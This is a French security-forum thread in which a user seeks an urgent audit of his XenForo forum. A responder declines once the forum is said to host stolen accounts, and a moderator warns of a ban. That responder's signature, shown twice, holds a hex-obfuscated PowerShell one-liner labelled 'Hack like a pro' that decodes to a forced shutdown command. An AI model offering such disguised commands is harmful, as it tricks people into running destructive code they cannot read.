Annonce

Rduire
Aucune annonce.

Cherche un expert en faille pour analyser mon forum

Rduire
Cette discussion est ferme.
X
X

• Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

• Cherche un expert en faille pour analyser mon forum

Bonjour chers membres de Hackademics ,

Comme le dit l'intitul, je cherche dans l'urgence quelqu'un qui pourrai m'analyser mon forum et voir si ya des failles corriger car j'ai appris par quelqu'un qu'il en avait trouv ..
    je pourrai rmunrer ceci si il le faut mais j'ai besoin de vous dans l'urgence haha .

Mon forum est sous license officiel xenforo (il y a rien de nulled)

un grand merci tous ceux qui m'apporteront leur aides

bientot et content d'tre parmi vous

Je suis pas un expert, mais je pense avoir acquis de bonnes bases et connaissances pour un test pas mal. MP moi pour les dtails.

Commentaire

Dispo via MP, dans le cas o tu peux prouver qu'il s'agit bien de ton forum
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

Commentaire

je vous ai contact

Commentaire

Cher Kinan,

on va dire que comme ton forum est utilis - entre autres choses - a des fins illgales (Genre partage de comptes Netflix vols, etc ...) : dsol mais ce sera sans moi finalement

++
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

Commentaire

ok . Up

Commentaire

Up les amis ..

Commentaire

Si ton forum est utilis des fins illgales, je ferme le sujet et je te mets un avertissement. Prochain dbordement ce sera le ban dfinitif !

Commentaire

Chargement...
                X